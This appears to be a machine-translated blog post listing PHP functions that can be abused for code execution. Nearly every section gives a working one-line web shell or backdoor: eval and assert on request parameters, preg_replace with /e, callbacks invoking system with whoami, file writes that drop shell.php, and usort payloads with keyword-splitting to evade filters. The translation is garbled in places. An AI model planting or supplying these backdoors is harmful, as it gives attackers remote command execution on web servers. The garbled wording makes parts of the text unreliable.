PHP can execute the code function, often used to write a one-sentence Trojan, may lead to code execution vulnerability, here to do some summary of the code execution function.
Common code executes functions such as
Eval (), assert(), preg_replace(), create_function()
Array_map (), call_user_func(), call_user_func_array(), array_filter, usort, uasort()
File manipulation function, dynamic function ($a($b))
1, the eval ()
The eval() function evaluates a string as PHP code, such as a common one-sentence backdoor: <? php eval($_POST[cmd])? >
2, assert ()
**** similar to eval, strings are executed as PHP code by assert(), as in:
Sample code:
<? php //? cmd=phpinfo() assert($_REQUEST[cmd]); ? >Copy the code3, the preg_replace ()
****mixed preg_replace ( mixed $pattern , mixed $replacement , mixed $subject [, int $limit = -1 [, int &$count ]] )
Search the part of the Subject that matches the pattern with replacement.
The preg_replace() function originally performs a regular expression search and replace, but because of the dangerous /e modifier, preg_replace() treats the replacement parameters as PHP code
Sample code:
<? php //? cmd=phpinfo() @preg_replace("/abc/e",$_REQUEST['cmd'],"abcd"); ? >Copy the code4, create_function ()
****create_function is primarily used to create anonymous functions. If parameter passing is not strictly filtered, an attacker can construct special strings to pass to create_function() to execute arbitrary commands.
Code examples:
<? php //? cmd=phpinfo(); $func =create_function('',$_REQUEST['cmd']); $func(); ? >Copy the codeReference links:
Code security: PHP create_function() injection command execution vulnerability
www.cnseay.com/1901/
Lovexm.blog.51cto.com/3567383/174…
Qqhack8.blog.163.com/blog/static…
5, array_map ()
The ****array_map() function applies a user-defined function to each value in the array and returns the array with the new value after the user-defined function is applied. The callback should take the same number of arguments as the array passed to array_map().
Code examples:
<? php //? func=system&cmd=whoami $func=$_GET['func']; $cmd=$_GET['cmd']; $array[0]=$cmd; $new_array=array_map($func,$array); //print_r($new_array); ? >Copy the code6, call_user_func ()/call_user_func_array ()
****call_user_func – The first argument is called as a callback function and the remaining arguments are arguments to the callback function.
Call_user_func_array – Calls the callback function and takes an array parameter to the callback function
<? php //? cmd=phpinfo() @call_user_func(assert,$_GET['cmd']); ? > <? php //? cmd=phpinfo() $cmd=$_GET['cmd']; $array[0]=$cmd; call_user_func_array("assert",$array); ? >Copy the code7, array_filter ()
array array_filter ( array $array [, callable $callback [, int $flag = 0 ]] )
Each value in the Array array is passed to the callback function in turn. If the callback function returns true, the current value of the array is included in the returned result array. The key name of the array remains the same.
<? php //? func=system&cmd=whoami $cmd=$_GET['cmd']; $array1=array($cmd); $func =$_GET['func']; array_filter($array1,$func); ? >Copy the code8, usort(), uasort()
****usort() sorts arrays through user-defined comparison functions.
Uasort () uses a user-defined comparison function to sort the values in an array and maintain index associations.
Code examples:
PHP environment >=5.6 php usort(... $_GET); ? Test.php? 1[]=1-1&1[]=eval($_POST['x'])&2=assert [POST]:x=phpinfo(); PHP environment >=<5.6 can use <? php usort($_GET,'asse'.'rt'); ? Test.php? 1=1+1&2=eval($_POST[x]) [POST]:x=phpinfo();Copy the codeSource: www.wd0g.com/?p=190
www.leavesongs.com/PHP/bypass-…
9. File manipulation functions
The ****file_put_contents() function writes a string to a file.
The fputs() function writes to the file
Code examples:
<? php $test='<? php eval($_POST[cmd]); ? > '; file_put_contents('test1.php',$test); ? > <? php fputs(fopen('shell.php','w'),'<? php eval($_POST[cmd])? > '); ? >Copy the code
10. Dynamic functions
****PHP functions are concatenated directly from strings
Code examples:
<? php //? a=assert&b=phpinfo() $_GET['a']($_GET['b']); ? >Copy the codeThe last
Welcome to pay attention to personal wechat public number: Bypass–, an original technical dry goods every week.
